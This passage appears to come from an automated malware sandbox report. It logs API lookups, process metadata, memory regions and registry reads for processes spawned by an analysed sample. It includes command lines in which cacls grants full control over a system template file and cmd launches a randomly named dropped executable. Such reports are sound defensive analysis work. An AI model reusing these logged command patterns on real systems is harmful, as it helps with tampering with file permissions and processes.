| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:23 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #185: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #185 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:12, Reason: Child Process |
| Unmonitor | End Time: 00:03:14, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x93c |
| Parent PID | 0x430 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
2C0
0x
950
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000001e0000 | 0x001e0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001f3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x00201fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x00203fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00223fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002e0000 | 0x0039dfff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe.mui | 0x003a0000 | 0x003a1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000520000 | 0x00520000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x007cffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x0483ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x04840000 | 0x04b76fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748a0000 | 0x748c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ee00000 | 0x7ee00000 | 0x7eefffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ef00000 | 0x7ef00000 | 0x7ef22fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ef24000 | 0x7ef24000 | 0x7ef24fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef28000 | 0x7ef28000 | 0x7ef28fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef2a000 | 0x7ef2a000 | 0x7ef2cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef2d000 | 0x7ef2d000 | 0x7ef2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #186: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #186 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c G13k6QZj.exe -accepteula "PDIALOG.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:12, Reason: Child Process |
| Unmonitor | End Time: 00:03:16, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x67c |
| Parent PID | 0x76c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DE4
0x
850
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000900000 | 0x00900000 | 0x0091ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000900000 | 0x00900000 | 0x0090ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000910000 | 0x00910000 | 0x00913fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000920000 | 0x00920000 | 0x00921fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000920000 | 0x00920000 | 0x00923fff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000004980000 | 0x04980000 | 0x04993fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000049a0000 | 0x049a0000 | 0x049dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049e0000 | 0x049e0000 | 0x04adffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ae0000 | 0x04ae0000 | 0x04ae3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004af0000 | 0x04af0000 | 0x04af0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004b00000 | 0x04b00000 | 0x04b01fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b10000 | 0x04b10000 | 0x04b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b50000 | 0x04b50000 | 0x04b9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bb0000 | 0x04bb0000 | 0x04bbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bc0000 | 0x04bc0000 | 0x04d0ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04d10000 | 0x04dcdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004dd0000 | 0x04dd0000 | 0x04ecffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04ed0000 | 0x05206fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f1f0000 | 0x7f1f0000 | 0x7f2effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f2f0000 | 0x7f2f0000 | 0x7f312fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f317000 | 0x7f317000 | 0x7f319fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f31a000 | 0x7f31a000 | 0x7f31cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f31d000 | 0x7f31d000 | 0x7f31dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f31f000 | 0x7f31f000 | 0x7f31ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 56, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0x41c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #187: wmiprvse.exe
0
0
| Information | Value |
|---|---|
| ID | #187 |
| File Name | c:\windows\system32\wbem\wmiprvse.exe |
| Command Line | C:\Windows\system32\wbem\wmiprvse.exe -Embedding |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:13, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:28 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x6d0 |
| Parent PID | 0x248 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
834
0x
C98
0x
2FC
0x
5C0
0x
D88
0x
7E0
0x
438
0x
CF8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x00000035f6440000 | 0x35f6440000 | 0x35f645ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000035f6440000 | 0x35f6440000 | 0x35f644ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000035f6450000 | 0x35f6450000 | 0x35f6456fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000035f6460000 | 0x35f6460000 | 0x35f6473fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000035f6480000 | 0x35f6480000 | 0x35f64fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000035f6500000 | 0x35f6500000 | 0x35f6503fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000035f6510000 | 0x35f6510000 | 0x35f6510fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000035f6520000 | 0x35f6520000 | 0x35f6521fff | Private Memory | rw |
|
|
|
- |
| private_0x00000035f6530000 | 0x35f6530000 | 0x35f6536fff | Private Memory | rw |
|
|
|
- |
| private_0x00000035f6540000 | 0x35f6540000 | 0x35f663ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x35f6640000 | 0x35f66fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000035f6700000 | 0x35f6700000 | 0x35f677ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000035f6780000 | 0x35f6780000 | 0x35f685ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000035f6780000 | 0x35f6780000 | 0x35f683ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000035f6840000 | 0x35f6840000 | 0x35f6840fff | Private Memory | rw |
|
|
|
- |
| private_0x00000035f6850000 | 0x35f6850000 | 0x35f685ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x35f6860000 | 0x35f6b96fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000035f6ba0000 | 0x35f6ba0000 | 0x35f6d27fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000035f6d30000 | 0x35f6d30000 | 0x35f6eb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000035f6ec0000 | 0x35f6ec0000 | 0x35f6ec0fff | Private Memory | rw |
|
|
|
- |
| user32.dll.mui | 0x35f6ed0000 | 0x35f6ed4fff | Memory Mapped File | r |
|
|
|
- |
| rpcss.dll | 0x35f6ee0000 | 0x35f6fb5fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000035f6ee0000 | 0x35f6ee0000 | 0x35f6ee0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000035f6ef0000 | 0x35f6ef0000 | 0x35f6f6ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000035f6f70000 | 0x35f6f70000 | 0x35f706ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000035f7070000 | 0x35f7070000 | 0x35f7070fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000035f7080000 | 0x35f7080000 | 0x35f7080fff | Pagefile Backed Memory | r |
|
|
|
- |
| ole32.dll | 0x35f7090000 | 0x35f71d0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000035f7090000 | 0x35f7090000 | 0x35f710ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000035f7110000 | 0x35f7110000 | 0x35f718ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000035f7190000 | 0x35f7190000 | 0x35f720ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000035f7210000 | 0x35f7210000 | 0x35f728ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000035f7290000 | 0x35f7290000 | 0x35f730ffff | Private Memory | rw |
|
|
|
- |
| advapi32.dll | 0x35f7310000 | 0x35f73b2fff | Memory Mapped File | rw |
|
|
|
- |
| acpi.sys | 0x35f7310000 | 0x35f7399fff | Memory Mapped File | rw |
|
|
|
- |
| ndis.sys | 0x35f7310000 | 0x35f742dfff | Memory Mapped File | rw |
|
|
|
- |
| mssmbios.sys | 0x35f7310000 | 0x35f731afff | Memory Mapped File | rw |
|
|
|
- |
| hdaudbus.sys | 0x35f7310000 | 0x35f7323fff | Memory Mapped File | rw |
|
|
|
- |
| portcls.sys | 0x35f7310000 | 0x35f735efff | Memory Mapped File | rw |
|
|
|
- |
| monitor.sys | 0x35f7310000 | 0x35f7319fff | Memory Mapped File | rw |
|
|
|
- |
| advapi32.dll.mui | 0x35f7310000 | 0x35f7357fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000035f7360000 | 0x35f7360000 | 0x35f755efff | Private Memory | rw |
|
|
|
- |
| private_0x00000035f7560000 | 0x35f7560000 | 0x35f765ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000035f7660000 | 0x35f7660000 | 0x35f785ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000035f7860000 | 0x35f7860000 | 0x35f7c5ffff | Private Memory | rw |
|
|
|
- |
| mofd.dll.mui | 0x35f7c60000 | 0x35f7c62fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000035f7c70000 | 0x35f7c70000 | 0x35f7c72fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000035f7c80000 | 0x35f7c80000 | 0x35f7c87fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000035f7c90000 | 0x35f7c90000 | 0x35f7c94fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000035f7ca0000 | 0x35f7ca0000 | 0x35f7ca1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff880000 | 0x7df5ff880000 | 0x7ff5ff87ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff696e0c000 | 0x7ff696e0c000 | 0x7ff696e0dfff | Private Memory | rw |
|
|
|
- |
